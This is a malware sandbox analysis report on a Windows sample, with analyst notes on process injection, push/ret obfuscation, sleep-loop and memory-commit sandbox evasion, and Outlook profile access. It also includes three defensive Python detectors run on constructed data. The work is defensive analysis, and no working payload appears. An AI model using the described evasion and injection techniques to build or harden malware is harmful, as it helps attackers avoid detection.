              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\user\Desktop\z10982283782.exe | Section loaded: amsi.dll (75 consecutive load events)
Source: C:\Users\user\Desktop\z10982283782.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\z10982283782.exe | Section loaded: amsi.dll (60 consecutive load events)
Source: C:\Users\user\Desktop\z10982283782.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\z10982283782.exe | Section loaded: amsi.dll (31 consecutive load events; 166 amsi.dll loads in total)
Source: C:\Users\user\Desktop\z10982283782.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: C:\Windows\SysWOW64\colorcpl.exe | Window found: window name: SysTabControl32
Source: C:\Windows\SysWOW64\colorcpl.exe | Window detected: Number of UI elements: 12
Source: C:\Windows\SysWOW64\takeown.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: z10982283782.exe | Static file information: File size 1114112 > 1048576
Source: Binary string: colorcpl.pdbGCTL | source: takeown.exe, 0000000D.00000002.2488818800.000000000093E000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000D.00000002.2492977299.000000000364C000.00000004.10000000.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000E.00000002.2492630368.000000000280C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.1830307466.0000000028E9C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: colorcpl.pdb | source: takeown.exe, 0000000D.00000002.2488818800.000000000093E000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000D.00000002.2492977299.000000000364C000.00000004.10000000.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000E.00000002.2492630368.000000000280C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.1830307466.0000000028E9C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: takeown.pdbGCTL | source: colorcpl.exe, 0000000A.00000003.1492463807.00000000028A1000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000A.00000002.1523639255.00000000028A0000.00000004.00000020.00020000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000C.00000003.1462420383.0000000000BEB000.00000004.00000020.00020000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000C.00000002.2490451481.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000C.00000002.2490451481.0000000000BF7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: ObMmiCfBgqmt.exe, 0000000C.00000002.2488106778.00000000004BE000.00000002.00000001.01000000.00000008.sdmp, ObMmiCfBgqmt.exe, 0000000E.00000002.2489652502.00000000004BE000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: easinvoker.pdb | source: z10982283782.exe, z10982283782.exe, 00000000.00000003.1235919667.000000007FAC0000.00000004.00001000.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1236633827.000000007F8B0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP | source: colorcpl.exe, 0000000A.00000003.1431854432.0000000022542000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000A.00000002.1538249660.000000002288E000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000A.00000003.1430019067.00000000048CE000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 0000000D.00000002.2492291107.0000000003020000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 0000000D.00000003.1531374042.0000000000C3D000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000D.00000003.1523711337.0000000000A3D000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000D.00000002.2492291107.00000000031BE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: takeown.pdb | source: colorcpl.exe, 0000000A.00000003.1492463807.00000000028A1000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000A.00000002.1523639255.00000000028A0000.00000004.00000020.00020000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000C.00000003.1462420383.0000000000BEB000.00000004.00000020.00020000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000C.00000002.2490451481.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000C.00000002.2490451481.0000000000BF7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: colorcpl.exe, colorcpl.exe, 0000000A.00000003.1431854432.0000000022542000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000A.00000002.1538249660.000000002288E000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000A.00000003.1430019067.00000000048CE000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, takeown.exe, 0000000D.00000002.2492291107.0000000003020000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 0000000D.00000003.1531374042.0000000000C3D000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000D.00000003.1523711337.0000000000A3D000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000D.00000002.2492291107.00000000031BE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdbGCTL | source: z10982283782.exe, 00000000.00000002.1351975173.00000000028CF000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1235919667.000000007FAC0000.00000004.00001000.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1236423933.00000000028D8000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1236633827.000000007F8B0000.00000004.00001000.00020000.00000000.sdmp

Note on the PDB rows: a debug path that names a binary other than the process it was found in (colorcpl.pdb inside takeown.exe, takeown.pdb inside colorcpl.exe and ObMmiCfBgqmt.exe, easinvoker.pdb inside private memory of the submitted sample) means a foreign PE image has been mapped into that process, consistent with the PE-injection signatures in the overview. The Chrome.pdb path under R:\JoeSecurity\...\FakeChrome belongs to the sandbox's own decoy browser binary, and it is found in the image-mapped region of ObMmiCfBgqmt.exe, so that process appears to be a renamed copy of sandbox tooling rather than attacker-authored code. The wntdll.pdb hits in colorcpl.exe (0x226F0000, 0x2288E000) and takeown.exe (0x3020000, 0x31BE000) carry the suffix .00000040.00001000.00020000, which reads as PAGE_EXECUTE_READWRITE / MEM_COMMIT / MEM_PRIVATE: a private, writable copy of the 32-bit ntdll rather than the loader-mapped ntdll.dll image, which is what a freshly loaded ntdll used for unhooked or indirect syscalls looks like (compare the direct/indirect syscall signature in the overview).
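The cross-process PDB check above can be done mechanically. The following is an added example (mine, not Joe Sandbox code and not part of this report): it parses CodeView RSDS records out of a memory dump and reports every PDB whose base name is not on an allow-list built from the modules the process legitimately loaded. The dump bytes, the GUIDs and the takeown.exe allow-list are constructed for the example; in practice the allow-list comes from the loaded-module list of the same dump (note that the 32-bit ntdll's PDB is named wntdll.pdb, so match on PDB names you have verified, not on module file names).

```python
"""Locate CodeView RSDS records in a memory dump and flag PDB names that
do not belong to any module the process is expected to have loaded.

Added example, not part of the Joe Sandbox report. A PDB path for a binary
the process never loaded (colorcpl.pdb inside takeown.exe, for instance) is
a cheap tell for an injected PE image. The dump below is constructed and the
expected-PDB allow-list is an assumption derived from the real module list.
"""
import re
import struct
import uuid
from dataclasses import dataclass

# PDB 7.0 CodeView record: 'RSDS', 16-byte GUID, 4-byte age, NUL-terminated path.
RSDS_RE = re.compile(
    rb"RSDS(?P<guid>.{16})(?P<age>.{4})(?P<path>[\x20-\x7e]{1,260})\x00", re.DOTALL
)


@dataclass(frozen=True)
class PdbRecord:
    guid: str
    age: int
    path: str


def pdb_stem(path: str) -> str:
    """'R:\\x\\Chrome.pdb' -> 'chrome'; accepts both slash styles."""
    name = re.split(r"[\\/]", path)[-1].lower()
    return name[:-4] if name.endswith(".pdb") else name


def extract_pdb_records(blob: bytes) -> list[PdbRecord]:
    """Every RSDS record found in the dump, in file order."""
    recs = []
    for m in RSDS_RE.finditer(blob):
        guid = str(uuid.UUID(bytes_le=m.group("guid")))
        age = struct.unpack("<I", m.group("age"))[0]
        recs.append(PdbRecord(guid, age, m.group("path").decode("ascii")))
    return recs


def foreign_pdbs(blob: bytes, expected_pdb_stems: set[str]) -> list[PdbRecord]:
    """Records whose PDB stem is not on the allow-list: candidate injected images."""
    return [r for r in extract_pdb_records(blob) if pdb_stem(r.path) not in expected_pdb_stems]


def rsds(guid: str, age: int, path: str) -> bytes:
    """Build a synthetic RSDS record (used only to construct the sample dump)."""
    return b"RSDS" + uuid.UUID(guid).bytes_le + struct.pack("<I", age) + path.encode("ascii") + b"\x00"


# Constructed stand-in for a takeown.exe memory dump (hypothetical GUIDs): the
# 32-bit ntdll record (wntdll.pdb) is legitimate; colorcpl.pdb and the sandbox
# FakeChrome pdb are foreign to this process.
SAMPLE_DUMP = (
    b"\x00" * 64
    + rsds("11111111-2222-3333-4444-555555555555", 1, "wntdll.pdb")
    + b"\xcc" * 32
    + rsds("aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", 1, "colorcpl.pdb")
    + b"\x90" * 16
    + rsds("01234567-89ab-cdef-0123-456789abcdef", 2,
           r"R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb")
)
# Assumed allow-list for takeown.exe (PDB stems of the modules it actually loaded).
TAKEOWN_EXPECTED = {"takeown", "wntdll", "ntdll", "kernel32", "kernelbase"}

if __name__ == "__main__":
    for r in foreign_pdbs(SAMPLE_DUMP, TAKEOWN_EXPECTED):
        print(f"foreign image in takeown.exe: {r.path} (guid {r.guid}, age {r.age})")
```

Run against a real dump, the GUID and age let you pull the matching PDB from a symbol server and confirm which binary was mapped; the report's rows only give the path string.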

              Data Obfuscation

Source: Yara match | File source: 0.2.z10982283782.exe.2a90000.0.unpack, type: UNPACKEDPE
Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02AA894C LoadLibraryW, GetProcAddress, FreeLibrary
Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02ABD2FC push 02ABD367h; ret (at 0_2_02ABD35F)
Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02A963AE push 02A9640Bh; ret (at 0_2_02A96403)
Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02A963B0 push 02A9640Bh; ret (at 0_2_02A96403)
Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02A9332C push eax; ret (at 0_2_02A93368)
Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02ABC378 push 02ABC56Eh; ret (at 0_2_02ABC566)
Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02A9C349 push 8B02A9C1h; ret (at 0_2_02A9C34E)
Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02ABD0AC push 02ABD125h; ret (at 0_2_02ABD11D)
Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02AA306B push 02AA30B9h; ret (at 0_2_02AA30B1)
Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02AA306C push 02AA30B9h; ret (at 0_2_02AA30B1)
Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02ABD1F8 push 02ABD288h; ret (at 0_2_02ABD280)
Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02AAF108 push ecx; mov dword ptr [esp], edx (at 0_2_02AAF10D)
Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02ABD144 push 02ABD1ECh; ret (at 0_2_02ABD1E4)
Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02A96782 push 02A967C6h; ret (at 0_2_02A967BE)
Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02A96784 push 02A967C6h; ret (at 0_2_02A967BE)
Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02A9D5A0 push 02A9D5CCh; ret (at 0_2_02A9D5C4)
Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02A9C56C push ecx; mov dword ptr [esp], edx (at 0_2_02A9C571)
Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02ABC570 push 02ABC56Eh; ret (at 0_2_02ABC566)
Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02AAAAE0 push 02AAAB18h; ret (at 0_2_02AAAB10)
Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02AA8AD8 push 02AA8B10h; ret (at 0_2_02AA8B08)
Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02AAAADF push 02AAAB18h; ret (at 0_2_02AAAB10)
Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02B04A50 push eax; ret (at 0_2_02B04B20)
Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02A9CA4E push 02A9CD72h; ret (at 0_2_02A9CD6A)
Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02A9CBEC push 02A9CD72h; ret (at 0_2_02A9CD6A)
Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02AA886C push 02AA88AEh; ret (at 0_2_02AA88A6)
Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02AA790C push 02AA7989h; ret (at 0_2_02AA7981)
Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02AA6948 push 02AA69F3h; ret (at 0_2_02AA69EB)
Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02AA6946 push 02AA69F3h; ret (at 0_2_02AA69EB)
Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02AA5E7C push ecx; mov dword ptr [esp], edx (at 0_2_02AA5E7E)
Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02AA2F60 push 02AA2FD6h; ret (at 0_2_02AA2FCE)
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_065F2F80 push eax; ret (at 10_2_065F2F82)
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_065F6C76 pushad ; ret (at 10_2_065F6C77)
Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02AAAB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\z10982283782.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\takeown.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (5 events)

Note on the push/ret rows: in almost every pair the pushed immediate is 8 bytes past the ret it is paired with (02ABD367h for the ret at 02ABD35F, 02A9640Bh for the ret at 02A96403, 02ABC56Eh for the ret at 02ABC566, and so on), so these are push/ret jumps that break linear disassembly rather than genuine returns; the 0_2_02A9C349 row (push 8B02A9C1h) is the one outlier and is most likely a mis-aligned decode of the same construct. The sample also resolves its imports at run time (LoadLibraryW/GetProcAddress in 0_2_02AA894C, GetModuleHandleA followed by a run of GetProcAddress calls in 0_2_02AAAB1C), so the static import table says little about which APIs the code actually calls. The "Process information set" flags are SetErrorMode flags; suppressing the critical-error, GP-fault and open-file dialogs keeps a crash in injected code from leaving a visible window on the desktop.
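To locate push/ret jumps like those listed above without a full disassembler, the following added example (mine, not Joe Sandbox code and not taken from the sample) scans a 32-bit code region for push imm32 followed within a short distance by ret and keeps only the pairs whose pushed address points a few bytes past the ret. The region bytes are constructed to reproduce the first row (push 02ABD367h at 02ABD2FC, ret at 02ABD35F); the gap and skip limits are assumptions, and the linear byte scan can pair a 0xC3 that sits inside another instruction's operand, which the in-image and short-skip checks keep rare.

```python
"""Heuristic scanner for push imm32 / ret control-flow obfuscation in 32-bit code.

Added example, not part of the Joe Sandbox report. It finds `push <addr>` ...
`ret` pairs where the pushed address lands a few bytes past the ret, the
pattern the Data Obfuscation rows show (push 02ABD367h paired with a ret at
02ABD35F). The bytes scanned below are constructed; max_gap and max_skip are
assumed limits, not values from the report.
"""
import struct
from dataclasses import dataclass

PUSH_IMM32 = 0x68
RET = 0xC3
RET_IMM16 = 0xC2


@dataclass(frozen=True)
class PushRetHit:
    push_va: int       # address of the push imm32
    ret_va: int        # address of the paired ret
    target_va: int     # pushed value, i.e. where execution really continues
    forward_skip: int  # bytes skipped after the ret: target_va - (ret_va + 1)


def find_push_ret_jumps(code: bytes, image_base: int,
                        max_gap: int = 128, max_skip: int = 64) -> list[PushRetHit]:
    """Linear byte scan (no disassembler). A push whose immediate is not an
    address inside this region is treated as an ordinary push and skipped."""
    hits = []
    end = image_base + len(code)
    for i in range(len(code) - 5):
        if code[i] != PUSH_IMM32:
            continue
        target = struct.unpack_from("<I", code, i + 1)[0]
        if not image_base <= target < end:
            continue
        j = i + 5
        limit = min(len(code), j + max_gap)
        while j < limit:
            b = code[j]
            if b == PUSH_IMM32:
                break            # a new push begins; any later ret pairs with that one
            if b in (RET, RET_IMM16):
                ret_va = image_base + j
                skip = target - (ret_va + 1)
                if 0 <= skip <= max_skip:
                    hits.append(PushRetHit(image_base + i, ret_va, target, skip))
                break
            j += 1
    return hits


def format_hit(h: PushRetHit) -> str:
    """Same shape as the report row: '<push va> push <target>h; ret <ret va>'."""
    return f"{h.push_va:08X} push {h.target_va:08X}h; ret {h.ret_va:08X}"


def build_sample() -> tuple[bytes, int]:
    """Constructed 160-byte region based at 02ABD2FC: one push/ret jump plus one
    ordinary push of a small constant followed by a genuine ret."""
    base = 0x02ABD2FC
    code = bytearray(b"\x90" * 160)
    code[0:5] = bytes([PUSH_IMM32]) + struct.pack("<I", 0x02ABD367)  # push 02ABD367h
    code[0x02ABD35F - base] = RET                                     # ret at 02ABD35F
    code[120:125] = bytes([PUSH_IMM32]) + struct.pack("<I", 0x10)     # push 10h (not an address)
    code[125] = RET
    return bytes(code), base


if __name__ == "__main__":
    code, base = build_sample()
    for hit in find_push_ret_jumps(code, base):
        print(format_hit(hit), f"(skips {hit.forward_skip} bytes after the ret)")
```

Feed it the unpacked region the Yara rule matched (0.2.z10982283782.exe.2a90000.0.unpack) with image_base 0x2A90000 and the hits line up with the rows above; every hit's target_va is the address to continue disassembly from.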

              Malware Analysis System Evasion

Source: C:\Users\user\Desktop\z10982283782.exe | Memory allocated: 2A90000 memory commit 500006912
Source: C:\Users\user\Desktop\z10982283782.exe | Memory allocated: 2A91000 memory commit 500178944
Source: C:\Users\user\Desktop\z10982283782.exe | Memory allocated: 2ABD000 memory commit 500002816
Source: C:\Users\user\Desktop\z10982283782.exe | Memory allocated: 2ABE000 memory commit 500350976
Source: C:\Users\user\Desktop\z10982283782.exe | Memory allocated: 2B14000 memory commit 501014528
Source: C:\Users\user\Desktop\z10982283782.exe | Memory allocated: 2C0C000 memory commit 500006912
Source: C:\Users\user\Desktop\z10982283782.exe | Memory allocated: 2C0E000 memory commit 500015104
Source: C:\Windows\SysWOW64\takeown.exe | API/Special instruction interceptor: Address: 7FFB2CECD324
Source: C:\Windows\SysWOW64\takeown.exe | API/Special instruction interceptor: Address: 7FFB2CECD7E4
Source: C:\Windows\SysWOW64\takeown.exe | API/Special instruction interceptor: Address: 7FFB2CECD944
Source: C:\Windows\SysWOW64\takeown.exe | API/Special instruction interceptor: Address: 7FFB2CECD504
Source: C:\Windows\SysWOW64\takeown.exe | API/Special instruction interceptor: Address: 7FFB2CECD544
Source: C:\Windows\SysWOW64\takeown.exe | API/Special instruction interceptor: Address: 7FFB2CECD1E4
Source: C:\Windows\SysWOW64\takeown.exe | API/Special instruction interceptor: Address: 7FFB2CED0154
Source: C:\Windows\SysWOW64\takeown.exe | API/Special instruction interceptor: Address: 7FFB2CECDA44
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2276096E rdtsc (at 10_2_2276096E)
Source: C:\Windows\SysWOW64\takeown.exe | Window / User API: threadDelayed 1041
Source: C:\Windows\SysWOW64\takeown.exe | Window / User API: threadDelayed 8932
Source: C:\Windows\SysWOW64\colorcpl.exe | API coverage: 0.6 %
Source: C:\Windows\SysWOW64\takeown.exe | API coverage: 2.6 %
Source: C:\Windows\SysWOW64\takeown.exe TID: 1916 | Thread sleep count: 1041 > 30
Source: C:\Windows\SysWOW64\takeown.exe TID: 1916 | Thread sleep time: -2082000s >= -30000s
Source: C:\Windows\SysWOW64\takeown.exe TID: 1916 | Thread sleep count: 8932 > 30
Source: C:\Windows\SysWOW64\takeown.exe TID: 1916 | Thread sleep time: -17864000s >= -30000s
Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe TID: 4016 | Thread sleep time: -35000s >= -30000s
Source: C:\Windows\SysWOW64\takeown.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\takeown.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02A95908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA
Source: C:\Windows\SysWOW64\takeown.exe | Code function: 13_2_0068C5F0 FindFirstFileW,FindNextFileW,FindClose

Note on the evasion rows: the seven commits of roughly 477 MiB each (500,006,912 bytes and similar) all land in the 2A90000 region that the Yara rule matched as the unpacked PE; allocations of this size exhaust memory-limited sandboxes and slow down memory scanning. The sleep values are printed as the negative NT relative-time argument and labelled in seconds, but the arithmetic shows they are milliseconds: 1041 sleeps add up to 2,082,000 and 8932 sleeps to 17,864,000, i.e. a loop of Sleep(2000) calls, against a 30,000 ms (30 s) per-thread threshold; TID 4016 in ObMmiCfBgqmt.exe trips the same threshold with a single 35 s delay. The eight interceptor hits in takeown.exe lie in 64-bit address space (7FFB2CECD1E4 through 7FFB2CED0154) although takeown.exe runs here as the 32-bit SysWOW64 binary; compare the "Found direct / indirect Syscall" signature in the overview. The rdtsc in colorcpl.exe is the timing check behind the "execution timing" signature. API coverage of 0.6 % and 2.6 % is the share of API-calling code the sandbox saw execute, so most of the injected code in both processes never ran during this analysis.
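The sleep and allocation thresholds the sandbox applies can be reproduced over an API trace. The following is an added example (mine, not Joe Sandbox's implementation): it re-implements the per-thread "sleep count > 30" and "total sleep >= 30 s" rules and adds a "repeated large commits" rule, then runs them over a constructed trace that mirrors the numbers above (1041 × Sleep(2000) on TID 1916, one 35 s sleep on TID 4016, the seven ~500 MB commits). The event format, the pids and the large-commit thresholds are assumptions.

```python
"""Sandbox-evasion heuristics over an API trace.

Added example, not part of the Joe Sandbox report and not Joe Sandbox code.
It re-implements the two per-thread thresholds the report prints
("Thread sleep count ... > 30", "Thread sleep time ... >= 30000" ms) and adds
a large-commit rule for the ~500 MB allocations, over a constructed trace.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Iterable, Optional

SLEEP_APIS = {"Sleep", "SleepEx", "NtDelayExecution"}
ALLOC_APIS = {"VirtualAlloc", "VirtualAllocEx", "NtAllocateVirtualMemory"}

SLEEP_COUNT_THRESHOLD = 30          # sleep calls per thread (report threshold)
SLEEP_TOTAL_MS_THRESHOLD = 30_000   # cumulative delay per thread, 30 s (report threshold)
LARGE_COMMIT_BYTES = 256 * 1024 * 1024   # assumed: what counts as a "large" commit
LARGE_COMMIT_COUNT = 3                   # assumed: this many large commits in one process


@dataclass(frozen=True)
class ApiEvent:
    pid: int
    tid: int
    api: str
    arg: int    # Sleep*: milliseconds; *Alloc*: bytes committed


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int
    tid: Optional[int]
    value: int


def evaluate(events: Iterable[ApiEvent]) -> list[Finding]:
    """Aggregate per thread (sleeps) and per process (large commits), then apply thresholds."""
    sleep_count: dict = defaultdict(int)
    sleep_ms: dict = defaultdict(int)
    commits: dict = defaultdict(list)
    for e in events:
        if e.api in SLEEP_APIS:
            sleep_count[(e.pid, e.tid)] += 1
            sleep_ms[(e.pid, e.tid)] += e.arg
        elif e.api in ALLOC_APIS and e.arg >= LARGE_COMMIT_BYTES:
            commits[e.pid].append(e.arg)

    findings = []
    for (pid, tid), n in sleep_count.items():
        if n > SLEEP_COUNT_THRESHOLD:
            findings.append(Finding("sleep_count", pid, tid, n))
        if sleep_ms[(pid, tid)] >= SLEEP_TOTAL_MS_THRESHOLD:
            findings.append(Finding("sleep_total_ms", pid, tid, sleep_ms[(pid, tid)]))
    for pid, sizes in commits.items():
        if len(sizes) >= LARGE_COMMIT_COUNT:
            findings.append(Finding("large_commits", pid, None, len(sizes)))
    return findings


def constructed_trace() -> list[ApiEvent]:
    """Constructed trace mirroring the report: takeown.exe TID 1916 sleeping
    2000 ms 1041 times, ObMmiCfBgqmt.exe TID 4016 sleeping once for 35 s, the
    sample's seven ~500 MB commits, plus a benign thread. Pids are arbitrary."""
    ev = [ApiEvent(13, 1916, "Sleep", 2000) for _ in range(1041)]
    ev.append(ApiEvent(14, 4016, "Sleep", 35_000))
    for size in (500006912, 500178944, 500002816, 500350976, 501014528, 500006912, 500015104):
        ev.append(ApiEvent(0, 4, "NtAllocateVirtualMemory", size))
    ev += [ApiEvent(1, 5, "Sleep", 10) for _ in range(5)]   # short waits, below both thresholds
    return ev


if __name__ == "__main__":
    for f in evaluate(constructed_trace()):
        print(f)
```

The single 35 s sleep shows why both rules are needed: it never trips the count rule, only the cumulative-time rule, which is exactly how the report scores TID 4016.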
